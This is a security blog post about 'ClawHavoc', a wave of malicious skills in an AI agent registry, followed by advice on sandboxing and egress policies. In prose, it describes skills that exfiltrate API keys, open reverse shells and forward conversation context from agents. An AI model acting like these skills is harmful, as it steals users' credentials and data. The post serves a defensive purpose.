In February 2026, security researchers confirmed what many in the OpenClaw community had already started to suspect: over 1,184 malicious skills — roughly 20% of all published packages — had been sitting in ClawHub, the public skill registry for OpenClaw agents.

The incident became known as ClawHavoc. It exposed a structural weakness in the AI agent ecosystem: when autonomous agents can install and execute third-party code without isolation, the supply chain is the attack surface.

What Happened

ClawHub launched as an open registry where developers could publish and share skills for OpenClaw agents. Skills extend what an agent can do — web scraping, file management, API integrations, calendar access, and more.

The problem: there was no mandatory security review. Skills were published freely, and agents could install them with a single command.

Researchers scanning the registry with VirusTotal and custom static analysis found:

1,184 confirmed malicious skills out of roughly 17,000 total — 20%
Skills that exfiltrated environment variables including API keys and tokens
Skills that opened reverse shells to external C2 servers
Skills that modified other installed skills to inject payloads downstream
Skills that silently forwarded conversation context to third-party endpoints

The malicious publishers used textbook social engineering: popular-sounding names, README files copied from legitimate projects, and version numbers suggesting a history of maintenance.

Why It Matters

OpenClaw has over 247,000 GitHub stars. It’s the most widely deployed AI agent framework in production in 2026. When an agent executes a malicious skill, it does so with whatever permissions the agent holds — filesystem access, network access, API credentials, and everything in the agent’s context window.

For most OpenClaw deployments at the time, that meant full access to the host system. No sandbox. No policy enforcement. No audit trail. The compromised skill could read your SSH keys, exfiltrate your API tokens, and call home to an external server — and you’d have no way to know.

This is categorically different from a compromised npm package. A rogue npm package is scoped to an application. A rogue AI agent skill runs inside an autonomous agent with broad system access and the ability to take further actions.

The Fix: VirusTotal Scanning

NVIDIA and the ClawHub maintainers responded by adding VirusTotal scanning to new skill publishes. Skills now go through automated analysis before appearing in the public registry.

This helps. It doesn’t solve the problem. Static analysis catches known-bad signatures — it doesn’t catch novel exfiltration techniques, and it can’t evaluate the intent of code that calls legitimate APIs in unauthorized ways. You’re protected against the patterns that were already flagged. Not against the next generation of the same attack.

The Real Solution: Isolation

The only mitigation that doesn’t have a bypass is kernel-level isolation. If your agent runs inside a properly configured sandbox, a malicious skill can’t reach your host filesystem, can’t make unapproved network connections, and can’t exfiltrate credentials — regardless of what the code tries to do.

This is exactly what NemoClaw and OpenShell provide:

Landlock LSM restricts filesystem access at the kernel level. The agent can only read and write directories explicitly allowed in the security policy. Your SSH keys, home directory, and credential files are invisible to the sandbox — not hidden, not access-controlled at the application layer, but invisible at the kernel.

seccomp filters system calls. The agent can’t spawn processes, modify permissions, or make system calls outside a curated allowlist. ClawHavoc skills that relied on spawning reverse shells hit a seccomp wall.

Network namespaces with deny-by-default egress policies mean the agent can only connect to endpoints you’ve explicitly approved. No calling home to a C2. No exfiltrating data to Pastebin.

Policy-as-code in YAML defines exactly what each agent can access — version-controlled and auditable:

network_policies:
  telegram:
    endpoints:
    - host: api.telegram.org
      port: 443
      protocol: rest
      tls: terminate
    binaries:
    - path: /usr/local/bin/openclaw
    - path: /usr/bin/curl

Every network connection is logged. Unapproved requests are blocked and flagged. If something tried to reach an endpoint that wasn’t in the policy, you have the record.

What You Should Do

If you’re running OpenClaw agents in production:

Don’t install skills from ClawHub without review. Read the source code. Check the publisher’s history. Look at the outbound network calls.
Run agents inside a kernel-level sandbox. NemoClaw with OpenShell provides isolation that no skill code can escape at the application layer. This is the single most effective mitigation available.
Use deny-by-default network policies. Your agent shouldn’t be able to reach arbitrary internet hosts. Whitelist only the endpoints your actual workflows need.
Audit your existing skills. If you installed skills before VirusTotal scanning was enabled, scan them manually. Look for outbound calls to unfamiliar domains, environment variable reads, and file access outside the expected workspace.
Separate credentials from the agent environment. Use a gateway — like OpenShell’s inference routing — to keep API keys on the host side, never inside the sandbox. The agent requests through the gateway; it never holds the actual credential.

The Pattern

ClawHavoc isn’t unique. It’s the same supply chain attack pattern that hit npm, PyPI, and Docker Hub — applied to a newer ecosystem with higher stakes and a faster-moving community. The AI agent world is building trust infrastructure in public, under fire, with real production deployments already at risk.

Sandbox isolation, policy enforcement, and credential separation aren’t security theater. They’re the minimum viable posture for any serious production agent deployment. The tools exist. ClawHavoc is what happens when teams skip them.

Jordi Sereix is the Technical Lead at ClawBastion, where we deploy and harden AI agent systems using NemoClaw and OpenShell. We offer AI Agent Security services including sandbox setup, policy authoring, and ongoing monitoring.